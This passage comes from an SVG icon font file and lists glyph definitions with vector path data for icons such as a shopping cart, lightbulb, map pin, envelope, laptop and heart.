<glyph unicode="&#xe902;" glyph-name="icons37" d="M990.72 639.744c-5.696 9.44-17.376 20.608-40.8 20.608h-651.648l-31.68 68.32c-1.856 4.672-4.416 9.312-8.192 14.336-2.208 2.912-4.64 5.696-8.672 9.312-2.56 2.272-5.312 4.288-8.192 6.080l-1.536 0.864c-2.912 1.664-5.952 3.168-9.088 4.288l-2.112 0.672c-3.104 0.96-6.112 1.856-9.344 2.4l-4.416 0.48c-1.984 0.288-3.936 0.448-5.952 0.448h-127.872c-34.304 0-62.080-27.904-62.080-62.080s27.904-62.208 62.080-62.208h87.968l35.552-76.832c8.736-25.408 20.896-47.36 20.96-47.36l87.808-197.12c0.768-1.568 1.568-3.104 2.848-4.992l16.384-34.848c6.336-20.576 22.656-36.192 42.688-41.856v-2.72l446.176 0.352-0.256 2.4c19.84 5.792 36 21.376 42.272 41.792l106.624 236.288c7.296 13.824 42.624 84.8 20.672 121.248zM938.368 534.304l-101.248-224.672-2.784 0.704-4.576-16.8c-3.168-11.872-13.952-20.192-27.328-20.192 0 0 0 0 0 0l-20.192 0.576v-0.928l-389.6 0.288c-12.32 0-23.072 8.288-26.272 20.224l-4.576 16.8-2.72-0.672-101.824 225.824c0 0-11.552 20.704-19.2 43.392l-46.144 100.032h-110.624c-14.72 0-26.752 12.032-26.752 26.752s12.032 26.752 26.752 26.752h129.024l3.232-0.32c1.344-0.256 2.656-0.608 4.896-1.344 1.344-0.48 2.624-1.184 4.576-2.24 1.248-0.8 2.4-1.728 4.128-3.104 1.184-1.056 2.208-2.24 3.456-3.872 1.44-1.984 2.496-3.872 3.648-6.592l41.504-89.728h674.272c8.288 0 9.92-2.496 10.432-3.552 7.616-12.544-5.024-54.848-22.048-87.168zM460.64 201.92c-47.968 0-86.976-39.008-86.976-86.976s39.008-86.976 86.976-86.976c47.936 0 86.944 39.008 86.944 86.976s-39.008 86.976-86.912 86.976zM460.64 59.456c-30.624 0-55.552 24.896-55.552 55.552s24.896 55.552 55.552 55.552c30.624 0 55.552-24.928 55.552-55.552s-24.96-55.552-55.552-55.552zM762.112 201.92c-47.968 0-86.976-39.008-86.976-86.976s39.040-86.976 86.976-86.976c47.936 0 86.912 39.008 86.912 86.976s-39.008 86.976-86.912 86.976zM762.112 59.456c-30.624 0-55.552 24.896-55.552 55.552s24.896 55.552 55.552 55.552c30.592 0 55.552-24.928 55.552-55.552s-24.928-55.552-55.552-55.552z" />
<glyph unicode="&#xe903;" glyph-name="icons39" d="M244.448 695.936c16.864 0 30.592 13.696 30.592 30.528s-13.696 30.464-30.592 30.464-30.592-13.696-30.592-30.464c0-16.864 13.728-30.528 30.592-30.528zM244.448 733.088c3.68 0 6.688-2.976 6.688-6.592 0-7.36-13.408-7.36-13.408 0 0 3.616 3.008 6.592 6.752 6.592zM807.904 818.4h-640.672c-6.528 0-11.904-5.376-11.904-11.904v-640.672c0-6.56 5.376-11.904 11.904-11.904h640.672c6.56 0 11.904 5.344 11.904 11.968v640.64c0 6.528-5.344 11.904-11.904 11.904zM795.936 794.528v-136.256h-616.768v136.256h616.768zM179.136 177.728v456.704h616.736v-456.704h-616.736zM486.464 694.976c17.408 0 31.552 14.112 31.552 31.52 0 17.312-14.144 31.424-31.552 31.424-17.312 0-31.424-14.048-31.424-31.424s14.048-31.52 31.424-31.52zM486.464 734.048c4.16 0 7.616-3.424 7.616-7.552 0-8.32-15.104-8.416-15.104 0 0 4.128 3.36 7.552 7.488 7.552zM252.736 574.752c-4.736 4.576-12.32 4.416-16.864-0.256-4.576-4.736-4.416-12.256 0.256-16.864l74.208-71.552-71.52-71.52c-4.64-4.64-4.64-12.224 0-16.864 2.4-2.304 5.408-3.456 8.448-3.456s6.080 1.12 8.384 3.456l88.672 88.704-91.648 88.448zM407.456 418.016h-80.032c-6.56 0-11.904-5.344-11.904-11.904 0-6.528 5.344-11.904 11.904-11.904h80.032c6.496 0 11.872 5.344 11.872 11.904s-5.376 11.904-11.872 11.904zM365.024 694.976c17.408 0 31.52 14.112 31.52 31.52 0 17.312-14.112 31.424-31.52 31.424-17.312 0-31.424-14.048-31.424-31.424s14.048-31.52 31.424-31.52zM365.024 734.048c4.16 0 7.616-3.424 7.616-7.552 0-8.32-15.168-8.416-15.168 0 0 4.128 3.392 7.552 7.552 7.552z" />
<glyph unicode="&#xe904;" glyph-name="icons42" d="M896.608 65.408h-716.864c-39.52 0-71.712 32.16-71.712 71.712v537.6c0 39.52 32.16 71.712 71.712 71.712h358.432c9.92 0 17.92-8.032 17.92-17.92s-8.032-17.92-17.92-17.92h-358.432c-19.744 0-35.84-16.064-35.84-35.84v-537.6c0-19.744 16.096-35.84 35.84-35.84h716.896c19.808 0 35.872 16.096 35.872 35.84v537.6c0 19.744-16.096 35.84-35.872 35.84-9.856 0-17.856 8.032-17.856 17.92s8.032 17.92 17.856 17.92c39.52 0 71.68-32.16 71.68-71.712v-537.6c0-39.52-32.16-71.712-71.712-71.712zM896.608 137.12h-609.312v537.6h179.2c9.856 0 17.856-8.032 17.856-17.92s-8.032-17.856-17.92-17.856h-143.392v-466.016h537.6v466.016h-35.84c-9.92 0-17.92 8.032-17.92 17.856 0 9.92 8.032 17.92 17.92 17.92h71.68v-537.6zM251.456 172.96h-143.392v466.016h143.392v-466.016zM143.904 208.768h71.712v394.272h-71.712v-394.272zM420.576 431.776l47.328 148.704 322.432 322.432c27.104 27.104 74.368 27.104 101.376 0 27.936-27.936 27.936-73.408 0-101.344l-322.432-322.432-148.704-47.328zM499.456 561.312l-23.648-74.4 74.368 23.648 316.256 316.224c13.952 14.016 13.952 36.736 0 50.72-13.568 13.568-37.152 13.568-50.72 0l-316.224-316.224zM126.016 495.584h107.52v-35.84h-107.52v35.84zM126.016 352.192h107.52v-35.84h-107.52v35.84zM853.696 770.88c-4.576 0-9.248 1.728-12.672 5.216l-76.032 76.032c-7.008 7.008-7.008 18.368 0 25.312s18.368 7.008 25.312 0l76.032-76.064c7.008-7.008 7.008-18.304 0-25.312-3.424-3.552-8.064-5.216-12.608-5.216zM752.384 669.504c-4.576 0-9.248 1.728-12.672 5.216l-76.032 76.064c-7.008 6.944-7.008 18.304 0 25.312 6.944 7.008 18.304 7.008 25.312 0l76.064-76.064c6.944-7.008 6.944-18.304 0-25.312-3.552-3.552-8.064-5.216-12.672-5.216zM559.712 476.96c-4.576 0-9.248 1.728-12.672 5.216l-76.064 76.032c-7.008 7.008-7.008 18.368 0 25.312s18.304 6.944 25.312 0l76.064-76.064c7.008-7.008 7.008-18.304 0-25.312-3.552-3.552-8.064-5.216-12.608-5.216zM412.736 405.952c-4.576 0-9.248 1.728-12.672 5.216-7.008 7.008-7.008 18.368 0 25.312l35.488 35.488c7.008 7.008 18.304 7.008 25.312 0s7.008-18.304 0-25.312l-35.488-35.488c-3.456-3.552-8.064-5.216-12.672-5.216z" />
<glyph unicode="&#xe905;" glyph-name="icons96" d="M558.72 704.64c-129.6 0-235.104-105.504-235.104-235.104 0-72.16 32.896-138.976 90.304-184.224 1.056-1.536 2.4-2.912 4.032-4.032 0.352-0.224 30.848-20.704 30.848-60.032 0-0.544 0.608-0.96 0.608-1.632 0-0.512-0.384-0.96-0.288-1.536l38.592-176.224c1.472-6.752 7.424-11.584 14.4-11.584h113.344c6.88 0 12.864 4.896 14.4 11.584l38.656 176.224c0 0.512-0.384 0.96-0.32 1.536 0 0.672 0.704 1.056 0.704 1.632 0 38.784 29.536 59.264 30.688 60.032 1.344 0.928 2.304 2.016 3.2 3.328 57.92 45.248 91.136 112.416 91.136 184.896 0 129.664-105.408 235.104-235.104 235.104zM603.552 59.808h-89.6l-3.104 14.528h95.904l-3.104-14.528zM613.152 103.808h-108.768l-3.232 14.624h115.264l-3.2-14.624zM622.848 147.936h-128.224l-12.768 58.592h153.888l-12.896-58.592zM682.048 305.888c-1.248-0.928-2.304-1.92-3.104-3.2-9.856-7.904-33.312-30.176-38.592-66.624h-66.88v205.6c0 16.192 13.216 29.344 29.376 29.344 8.128 0 14.752 6.592 14.752 14.752s-6.688 14.752-14.752 14.752c-17.824 0-33.28-8.416-44.128-20.96-1.056 1.216-1.376 2.72-2.56 3.872-11.008 11.008-25.728 17.152-41.216 17.152 0 0 0 0-0.224 0-8.128 0-14.656-6.592-14.656-14.848 0-8.192 6.56-14.656 14.752-14.656 0 0 0 0 0 0s0 0 0 0c7.68 0 14.976-2.976 20.512-8.512 5.568-5.568 8.672-12.896 8.672-20.832v-205.6h-66.848c-5.216 36.256-28.576 58.496-38.528 66.56-0.864 1.216-1.92 2.336-3.2 3.2-52.416 39.648-82.368 99.264-82.368 163.712 0 113.376 92.224 205.632 205.568 205.632 113.44 0 205.632-92.224 205.632-205.632 0-64.48-30.016-124.032-82.304-163.712zM563.872 762.080c8.128 0 14.752 6.592 14.752 14.72v99.040c0 8.192-6.688 14.752-14.752 14.752-8.192 0-14.624-6.592-14.624-14.752v-99.072c0-8.128 6.496-14.656 14.624-14.656zM343.424 679.456c2.912-2.912 6.688-4.352 10.432-4.352 3.872 0 7.616 1.44 10.4 4.288 5.728 5.728 5.728 15.072 0 20.864l-69.888 70.016c-5.728 5.76-15.104 5.76-20.864 0-5.696-5.728-5.696-15.072 0-20.832l70.016-70.016zM281.664 479.808c0 8.128-6.592 14.752-14.656 14.752h-99.168c-8.192 0-14.752-6.624-14.752-14.752s6.592-14.752 14.752-14.752h99.168c8.128 0 14.656 6.592 14.656 14.752zM343.648 280.288l-70.176-70.080c-5.696-5.728-5.696-15.072 0-20.832 2.912-2.912 6.752-4.288 10.528-4.288 3.648 0 7.52 1.44 10.4 4.288l70.080 70.048c5.728 5.76 5.728 15.104 0 20.864-5.696 5.696-15.040 5.76-20.8 0zM784.224 267.648c-5.728 5.632-15.008 5.728-20.832 0-5.792-5.76-5.792-15.104 0-20.832l69.888-70.176c2.912-2.848 6.752-4.288 10.528-4.288s7.52 1.44 10.4 4.288c5.728 5.728 5.728 15.072 0 20.832l-70.016 70.176zM959.872 494.56h-99.072c-8.128 0-14.752-6.528-14.752-14.752 0-8.128 6.56-14.656 14.752-14.656h99.072c8.192 0 14.752 6.528 14.752 14.752 0 8.128-6.528 14.752-14.752 14.752zM773.824 675.104c3.776 0 7.488 1.44 10.528 4.352l70.080 70.016c5.728 5.76 5.728 15.104 0 20.864-5.696 5.728-15.040 5.792-20.864 0l-70.080-70.016c-5.792-5.76-5.792-15.072 0-20.8 2.752-2.912 6.528-4.384 10.336-4.384z" />
<glyph unicode="&#xe906;" glyph-name="icons112" d="M200.064 745.408c21.856 0 39.584 17.728 39.584 39.52s-17.728 39.456-39.584 39.456c-21.824 0-39.456-17.696-39.456-39.456 0-21.856 17.696-39.52 39.456-39.52zM200.064 793.504c4.896 0 8.736-3.776 8.736-8.512 0-9.664-17.28-9.92-17.28 0 0 4.672 3.872 8.512 8.512 8.512zM929.536 903.968h-829.44c-8.384 0-15.36-6.944-15.36-15.424v-829.376c0-8.48 6.944-15.424 15.36-15.424h829.44c8.448 0 15.424 6.944 15.424 15.488v829.344c0 8.448-6.944 15.424-15.424 15.424zM914.112 873.056v-176.384h-798.528v176.384h798.528zM115.616 74.592v591.232h798.496v-591.232h-798.496zM513.536 744.192c22.4 0 40.576 18.272 40.576 40.768 0 22.4-18.144 40.64-40.576 40.64s-40.768-18.208-40.768-40.64c0-22.464 18.304-40.768 40.768-40.768zM513.536 794.688c5.376 0 9.76-4.416 9.76-9.792 0-10.88-19.648-10.784-19.648 0 0 5.344 4.48 9.792 9.856 9.792zM356.352 744.192c22.4 0 40.576 18.272 40.576 40.768 0 22.4-18.144 40.64-40.576 40.64-22.528 0-40.768-18.208-40.768-40.64 0-22.464 18.208-40.768 40.768-40.768zM356.352 794.688c5.344 0 9.76-4.416 9.76-9.792 0-10.88-19.68-10.784-19.68 0 0 5.344 4.416 9.792 9.952 9.792z" />
<glyph unicode="&#xe907;" glyph-name="icons158" d="M525.568 892.704c-136.032 0-246.688-110.656-246.688-246.688 0-95.136 89.28-271.008 169.152-409.344-90.624-14.528-150.208-52.736-150.208-98.784 0-60.096 97.92-105.408 227.808-105.408s227.808 45.344 227.808 105.472c0 46.080-59.616 84.288-150.176 98.784 79.744 138.336 169.12 314.304 169.12 409.344 0 136-110.688 246.656-246.72 246.656zM525.568 861.184c118.656 0 215.168-96.416 215.168-215.168 0-97.44-110.368-300.896-176.256-413.632-15.872-27.136-29.536-49.536-38.88-64.768-9.312 15.2-22.976 37.6-38.848 64.768-65.888 112.672-176.384 316.128-176.384 413.632 0 118.656 96.48 215.168 215.232 215.168zM721.856 137.92c0-35.072-80.608-73.984-196.288-73.984s-196.32 38.912-196.32 73.984c0 26.176 50.528 58.592 135.552 69.76 4.096-6.944 7.52-12.672 11.296-18.912 1.984-3.392 4.16-6.944 6.080-10.176 4.704-7.68 8.672-14.144 12.352-20.288 1.184-1.888 2.464-4.032 3.552-5.728 4.032-6.688 7.2-11.712 9.6-15.616 0.256-0.288 0.576-0.928 0.864-1.28 2.4-3.872 3.776-6.048 3.776-6.048l13.248-20.96 13.344 20.96c0 0 1.248 1.984 3.616 5.696 0.512 0.864 1.28 2.176 1.984 3.328 2.4 3.648 5.088 8.128 8.736 14.144 0.864 1.28 1.856 2.912 2.752 4.352 3.904 6.464 8.192 13.504 13.216 21.856 1.664 2.848 3.648 6.112 5.568 9.248 3.776 6.336 7.424 12.352 11.648 19.52 85.056-11.040 135.488-43.552 135.488-69.728zM679.968 646.080c0 85.056-69.248 154.24-154.4 154.24s-154.272-69.216-154.272-154.24c0-85.152 69.216-154.432 154.272-154.432s154.4 69.248 154.4 154.432zM402.784 646.080c0 67.712 55.136 122.72 122.88 122.72 67.712 0 122.88-55.072 122.88-122.72 0-67.776-55.136-122.912-122.88-122.912-67.68 0-122.88 55.136-122.88 122.912z" />
<glyph unicode="&#xe908;" glyph-name="icons163" d="M676 155.136c15.168 0 26.272 12.32 26.272 27.488v194.592c0 15.168-11.232 27.488-26.272 27.488-15.168 0-26.368-12.32-26.368-27.488v-194.592c0-15.2 11.232-27.488 26.368-27.488zM552.448 155.136c15.168 0 26.336 12.32 26.336 27.488v194.592c0 15.168-11.232 27.488-26.336 27.488s-26.336-12.32-26.336-27.488v-194.592c0-15.2 11.232-27.488 26.336-27.488zM429.024 155.136c15.168 0 26.336 12.32 26.336 27.488v194.592c0 15.168-11.232 27.488-26.336 27.488-15.168 0-26.336-12.32-26.336-27.488v-194.592c0-15.2 11.232-27.488 26.336-27.488zM875.68 652.128h-152.736l-78.272 126.048c-9.856 16.992-28.096 27.552-47.776 27.552-9.6 0-19.2-2.56-27.488-7.392-26.272-15.168-35.36-48.928-19.744-75.872l44.832-70.272h-228.672l45.248 71.008c15.168 26.24 6.112 60.096-20.224 75.264-8.384 4.896-17.824 7.392-27.488 7.392-19.68 0-37.92-10.592-47.456-27.008l-78.656-126.56h-131.52c-40.736 0-73.824-33.152-73.824-73.824v-42.144c0-36.576 26.784-72.384 61.664-78.24l55.36-316.608c0.864-39.968 33.632-72.192 73.792-72.192h533.504c40.192 0 72.992 32.288 73.824 72.224l55.104 316.32c36.192 4.704 64.352 41.056 64.352 78.496v42.144c0 40.736-33.12 73.824-73.824 73.824zM795.008 145.824l-0.256-2.976c0-21.248-17.312-38.528-38.592-38.528h-533.504c-21.248 0-38.528 17.28-38.528 38.528l-54.56 313.792h719.648l-54.144-310.848zM914.144 536.064c0-21.216-17.28-44.224-38.528-44.224h-769.952c-21.248 0-38.528 22.976-38.528 44.224v42.144c0 21.248 17.28 38.528 38.528 38.528h151.136l89.28 143.648c5.28 9.088 17.824 12.544 27.040 7.2 9.44-5.408 12.768-17.632 7.68-26.368l-79.488-124.576h357.504l-79.136 123.904c-5.376 9.44-2.176 21.6 7.2 27.040 9.312 5.312 21.632 2.112 27.392-7.68l89.024-143.2h172.352c21.248 0 38.528-17.28 38.528-38.528v-42.144zM305.568 155.136c15.168 0 26.272 12.32 26.272 27.488v194.592c0 15.168-11.232 27.488-26.272 27.488-15.168 0-26.336-12.32-26.336-27.488v-194.592c0-15.2 11.232-27.488 26.336-27.488z" />
<glyph unicode="&#xe909;" glyph-name="icons171" d="M891.584 376h-672.064v134.432c0 37.056 30.144 67.232 67.232 67.232h168.736c5.568 0 10.784 2.752 13.92 7.392 3.104 4.576 3.776 10.528 1.664 15.648-10.848 27.136-16.384 55.744-16.384 85.024v127.136c0 55.584 45.216 100.8 100.8 100.8s100.8-45.216 100.8-100.8v-127.136c0-29.248-5.568-57.824-16.352-85.024-2.048-5.216-1.44-11.008 1.632-15.648 3.104-4.576 8.384-7.392 13.952-7.392h168.736c37.056 0 67.2-30.144 67.2-67.232v-134.368zM253.12 409.6h604.832v100.8c0 18.528-15.072 33.6-33.6 33.6h-168.736c-16.704 0-32.352 8.288-41.696 22.144-9.344 13.92-11.296 31.488-5.024 46.976 9.312 23.136 13.952 47.552 13.952 72.544v127.2c0 37.056-30.144 67.232-67.232 67.232s-67.232-30.144-67.232-67.232v-127.136c0-24.96 4.704-49.344 13.952-72.512 6.208-15.584 4.288-33.12-5.024-46.976-9.344-13.92-24.96-22.176-41.696-22.176h-168.8c-18.528 0-33.632-15.104-33.632-33.632v-100.8zM841.184 107.168h-419.968c-4.416 0-8.736 1.76-11.872 4.896-3.104 3.104-4.896 7.424-4.896 11.872v63.2l-35.36-70.784c-2.912-5.696-8.736-9.312-15.040-9.312h-84c-9.312 0-16.8 7.52-16.8 16.8v268.8c0 9.312 7.52 16.8 16.8 16.8h571.232c9.312 0 16.8-7.52 16.8-16.8v-268.8c0-9.312-7.52-16.8-16.8-16.8zM437.984 140.8h386.4v235.232h-537.6v-235.232h56.768l62.496 125.152c3.552 6.944 11.296 10.592 18.912 8.864s12.928-8.512 12.928-16.352v-117.632zM774.016 107.168c-9.312 0-16.8 7.52-16.8 16.8v168c0 9.312 7.52 16.8 16.8 16.8 9.248 0 16.736-7.52 16.736-16.8v-168c0-9.312-7.52-16.8-16.736-16.8zM706.784 107.168c-9.312 0-16.8 7.52-16.8 16.8v134.432c0 9.312 7.52 16.8 16.8 16.8s16.8-7.52 16.8-16.8v-134.432c0-9.312-7.52-16.8-16.8-16.8zM639.52 107.168c-9.248 0-16.736 7.52-16.736 16.8v84c0 9.312 7.52 16.8 16.736 16.8 9.312 0 16.8-7.52 16.8-16.8v-84c0-9.312-7.52-16.8-16.8-16.8zM589.184 812.832c0-18.56-15.040-33.6-33.6-33.6s-33.6 15.040-33.6 33.6c0 18.56 15.040 33.6 33.6 33.6s33.6-15.040 33.6-33.6z" />
<glyph unicode="&#xe90a;" glyph-name="icons180" d="M663.136 636.096c4.032 0 7.84 1.632 10.624 4.384l94.752 94.752c2.848 2.912 4.384 6.752 4.384 10.688 0 4.032-1.536 7.84-4.384 10.624l-94.752 94.56c-2.784 2.912-6.624 4.416-10.624 4.416h-142.592v16.416c0 8.288-6.752 15.104-15.040 15.104s-15.072-6.752-15.072-15.104v-16.416h-237.248c-6.080 0-11.616-3.68-13.92-9.312-2.336-5.632-1.056-12.096 3.232-16.416l83.936-83.936-83.936-84c-4.288-4.288-5.568-10.752-3.328-16.512 2.272-5.632 7.776-9.312 13.92-9.312h237.152v-31.712h-142.688c-4.032 0-7.776-1.632-10.624-4.416l-94.624-94.624c-5.92-5.92-5.92-15.488 0-21.344l94.624-94.656c2.912-2.912 6.624-4.416 10.624-4.416h142.752v-233.888c-86.304-4.128-152.192-42.080-152.192-90.368 0-51.104 73.44-91.136 167.232-91.136s167.264 40 167.264 91.136c0 48.288-65.728 86.272-152.096 90.368v233.888h237.152c6.080 0 11.616 3.68 13.952 9.312s1.056 12.096-3.328 16.448l-83.904 84 83.904 84c4.288 4.288 5.568 10.752 3.328 16.416-2.336 5.632-7.872 9.312-13.952 9.312h-237.216v31.712h142.72zM642.4 60.64c0-28.8-56.32-60.928-137.088-60.928s-136.96 32.16-136.96 60.928c0 26.912 49.536 56.48 121.984 60.224v-60.224c0-8.192 6.752-15.040 15.072-15.040s15.040 6.752 15.040 15.040v60.224c72.448-3.776 121.856-33.312 121.856-60.224zM721.312 574.176l-68.832-68.864c-5.92-5.92-5.92-15.488 0-21.344l68.832-68.896h-367.392l-79.488 79.52 79.488 79.488h367.392zM289.568 666.336l68.832 68.864c5.92 5.952 5.92 15.488 0 21.376l-68.8 68.8h367.392l79.488-79.456-79.488-79.52h-367.392z" />
<glyph unicode="&#xe90b;" glyph-name="icons185" d="M606.656 367.456c-2.272 2.208-5.088 2.752-8 3.328 54.144 58.112 84.512 132.672 84.512 212.448 0 83.456-32.512 162.048-91.584 221.056-59.104 59.136-137.664 91.68-221.184 91.68s-162.112-32.544-221.248-91.68c-59.040-59.040-91.616-137.6-91.584-221.152 0-83.52 32.576-162.112 91.712-221.152 59.040-59.104 137.536-91.616 221.088-91.616 79.712 0 154.304 30.368 212.352 84.416 0.512-2.848 1.12-5.728 3.232-7.968l253.152-253.088c2.752-2.784 6.528-4.288 10.24-4.288s7.424 1.472 10.24 4.288c5.696 5.696 5.696 14.88 0 20.512l-253.024 253.152zM570.976 382.56c-53.568-53.536-124.8-83.104-200.608-83.104-75.744 0-147.008 29.568-200.608 83.104-53.568 53.632-83.104 124.8-83.104 200.64 0 75.776 29.504 147.008 83.008 200.608 53.664 53.632 124.96 83.168 200.672 83.168 75.744 0 147.008-29.568 200.64-83.168 53.568-53.632 83.104-124.8 83.104-200.544 0-75.776-29.568-147.040-83.168-200.672zM134.24 583.040h29.024c0 114.176 92.992 207.136 207.136 207.136v29.088c-130.208 0-236.16-105.952-236.16-236.224z" />
<glyph unicode="&#xe90c;" glyph-name="icons202" d="M524.704 116.896c-29.28 0-53.12-23.744-53.12-53.024s23.744-53.12 53.12-53.12 53.12 23.776 53.12 53.12-23.744 53.024-53.12 53.024zM524.704 38.944c-13.728 0-24.96 11.232-24.96 24.96s11.232 24.928 24.96 24.928c13.728 0 24.96-11.232 24.96-24.928s-11.232-24.96-24.96-24.96zM485.728 845.184h47.648c7.776 0 14.048 6.336 14.048 14.048s-6.336 14.048-14.048 14.048h-47.648c-7.776 0-14.048-6.336-14.048-14.048s6.336-14.048 14.048-14.048zM718.016 765.184h-410.816c-9.664 0-17.536-7.872-17.536-17.536v-592.384c0-9.664 7.872-17.536 17.536-17.536h410.816c9.664 0 17.504 7.904 17.504 17.536v592.384c0 9.664-7.872 17.536-17.504 17.536zM700.384 172.768h-375.68v557.28h375.68v-557.28zM448.288 800.576h125.632c7.776 0 14.048 6.336 14.048 14.048s-6.336 14.048-14.048 14.048h-125.632c-7.776 0-14.048-6.336-14.048-14.048s6.336-14.048 14.048-14.048zM738.080 939.36h-454.080c-35.488 0-64.448-28.864-64.448-64.448v-850.016c0-35.488 28.928-64.448 64.448-64.448h454.080c35.552 0 64.448 28.864 64.448 64.448v850.016c0 35.488-28.8 64.448-64.448 64.448zM767.36 24.96c0-16.192-13.152-29.28-29.28-29.28h-454.080c-16.192 0-29.28 13.152-29.28 29.28v850.016c0 16.192 13.152 29.28 29.28 29.28h454.080c16.192 0 29.28-13.152 29.28-29.28v-850.016zM379.744 786.56c15.52 0 28.096 12.608 28.096 28.096s-12.544 28.096-28.096 28.096-28.128-12.608-28.128-28.096 12.608-28.096 28.128-28.096zM379.744 825.184c5.728 0 10.592-4.704 10.592-10.592 0-5.92-4.704-10.592-10.592-10.592-5.92 0-10.592 4.704-10.592 10.592 0 5.792 4.704 10.592 10.592 10.592z" />
<glyph unicode="&#xe90d;" glyph-name="icons206" d="M717.376 447.936h-414.688c-8.448 0-15.424-6.944-15.424-15.424s6.944-15.424 15.424-15.424h414.688c8.512 0 15.424 6.944 15.424 15.424s-6.912 15.424-15.424 15.424zM717.376 551.744h-414.752c-8.512 0-15.488-6.944-15.488-15.424s6.912-15.424 15.488-15.424h414.752c8.512 0 15.424 6.944 15.424 15.424s-6.912 15.424-15.424 15.424zM717.376 655.264h-414.688c-8.448 0-15.424-6.944-15.424-15.392s6.944-15.424 15.424-15.424h414.688c8.512 0 15.424 6.944 15.424 15.424 0 8.448-6.912 15.392-15.424 15.392zM872.864 862.688h-725.568c-37.152 0-67.328-30.272-67.328-67.296v-518.272c0-36.416 29.152-66.112 65.184-67.232 0.704 0 1.472 0 2.112 0h408.288l202.688-202.72c2.976-2.912 6.944-4.48 11.008-4.48 1.888 0 3.936 0.32 5.92 1.184 5.728 2.4 9.536 7.968 9.536 14.24v191.808h88.192c0.8 0 1.472 0 2.208 0 35.904 1.184 64.928 30.72 65.12 67.36v518.272c0 36.992-30.336 67.072-67.328 67.072zM909.312 276.96c0-19.968-16.448-36.224-36.416-36.224-0.672 0-1.28 0-1.856 0h-101.728c-8.608 0-15.424-6.944-15.424-15.488v-170.016l-181.024 180.896c-2.912 2.912-6.752 4.576-10.88 4.576h-412.832c-0.704 0-1.216 0-1.856 0-20.064 0-36.416 16.352-36.416 36.416v518.272c0 20.064 16.32 36.448 36.416 36.448h725.568c19.936 0 36.352-16.352 36.416-36.576v-518.368z" />
<glyph unicode="&#xe90e;" glyph-name="icons208" d="M943.424 729.952c0 1.792-1.28 2.976-1.984 4.672-0.48 1.568-0.224 3.328-1.28 4.768-0.288 0.32-0.672 0.256-0.864 0.448-1.28 1.536-3.104 1.984-4.992 2.912-1.856 0.8-3.328 2.048-5.28 2.176-0.352 0-0.544 0.384-0.928 0.384h-829.376c-0.352 0-0.544-0.352-0.928-0.384-2.016 0-3.552-1.344-5.28-2.176-1.856-0.928-3.648-1.44-5.024-2.912 0-0.256-0.576 0-0.864-0.448-1.056-1.44-0.768-3.2-1.248-4.896-0.672-1.632-1.984-2.848-1.984-4.64v-518.272c0-1.792 1.28-2.976 1.984-4.64 0.48-1.632 0.224-3.392 1.248-4.896 0.256-0.32 0.544 0 0.864-0.416 2.784-3.232 6.752-5.568 11.296-5.568h829.376c4.576 0 8.448 2.272 11.296 5.568 0.288 0.256 0.512 0 0.8 0.416 1.12 1.44 0.8 3.168 1.28 4.896 0.672 1.632 1.984 2.848 1.984 4.64v518.272zM114.112 698.496l293.6-227.712-293.6-227.616v455.296zM584.544 483.072c0 0-0.224 0-0.224 0l-70.912-55.136-3.2 2.464-67.68 52.64c0 0-0.224 0-0.352 0l-298.4 231.424h739.104l-298.336-231.424zM432.928 451.264l71.008-54.944c1.536-1.216 3.552-1.248 5.28-1.856 1.056-0.256 1.856-0.96 2.976-1.024 0.416 0 0.704-0.416 1.184-0.416 0.352 0 0.672 0.384 1.12 0.384 1.12 0 1.888 0.704 2.912 1.024 1.856 0.512 3.872 0.672 5.376 1.856l71.008 54.944 289.024-224.224h-739.104l289.152 224.224zM619.008 470.784l293.536 227.712v-455.296l-293.536 227.616z" />
<glyph unicode="&#xe90f;" glyph-name="icons236" horiz-adv-x="1056" d="M695.936 328.352h-337.984c-6.464 0-11.648-5.216-11.648-11.648s5.216-11.648 11.648-11.648h337.984c6.464 0 11.648 5.216 11.648 11.648s-5.216 11.648-11.648 11.648zM817.472 748.192h-571.712c-8.992 0-16.352-7.296-16.352-16.32v-360.096c0-8.992 7.296-16.32 16.352-16.32h571.712c8.992 0 16.352 7.296 16.352 16.32v360.096c0 8.992-7.296 16.32-16.352 16.32zM801.184 388.032h-539.136v327.552h539.136v-327.552zM970.816 278.816h-54.112v508.576c0 27.424-19.84 49.792-44.224 49.792h-687.232c-24.352 0-44.224-22.304-44.224-49.792v-508.576h-57.92c-25.056 0-45.472-22.816-45.472-50.752 0-13.248 4.48-25.632 12.672-35.136 0 0 0-0.256 0.256-0.352l67.424-82.144c3.104-3.776 7.68-5.952 12.512-5.952h779.424c4.288 0 8.448 1.728 11.552 4.736l72.736 72.736c1.632 1.632 2.784 3.456 3.552 5.408 11.232 9.312 18.464 23.936 18.464 40.608 0 27.968-20.48 50.752-45.472 50.752zM173.696 787.456c0 10.080 6.048 17.12 11.584 17.12h687.232c5.568 0 11.616-7.296 11.616-17.12v-508.576h-710.464v508.576zM903.264 137.088h-765.088l-32.928 40.192h838.176l-40.096-40.192zM970.816 209.952h-887.744c-3.616 0-6.336 2.176-7.904 3.904-3.168 3.552-4.992 8.736-4.992 14.24 0 9.856 5.92 18.112 12.896 18.112h887.712c6.944 0 12.864-8.288 12.864-18.112 0-9.952-5.92-18.208-12.864-18.208z" />
<glyph unicode="&#xe910;" glyph-name="heart3" d="M934.176 791.52c-116.128 115.072-301.824 117.472-422.112 9.216-120.32 108.256-305.952 105.856-422.144-9.216-119.712-118.528-119.712-310.688 0-429.28 34.208-33.888 353.696-350.112 353.696-350.112 37.856-37.504 99.072-37.504 136.896 0 0 0 349.824 346.304 353.696 350.112 119.744 118.592 119.744 310.752-0.032 429.28zM888.576 407.424l-353.696-350.112c-12.576-12.512-33.088-12.512-45.6 0l-353.696 350.112c-94.4 93.44-94.4 245.472 0 338.912 91.008 90.080 237.312 93.248 333.088 7.104l43.392-39.040 43.36 39.040c95.808 86.144 242.112 83.008 333.12-7.104 94.4-93.408 94.4-245.44 0.032-338.912zM296.096 719.968c8.864 0 16-7.168 16-16s-7.168-16-16-16h-0.032c-57.408 0-103.968-46.56-103.968-103.968v-0.032c0-8.832-7.168-16-16-16s-16 7.168-16 16v0c0 75.072 60.832 135.904 135.872 135.968 0.064 0 0.064 0.032 0.128 0.032z" />
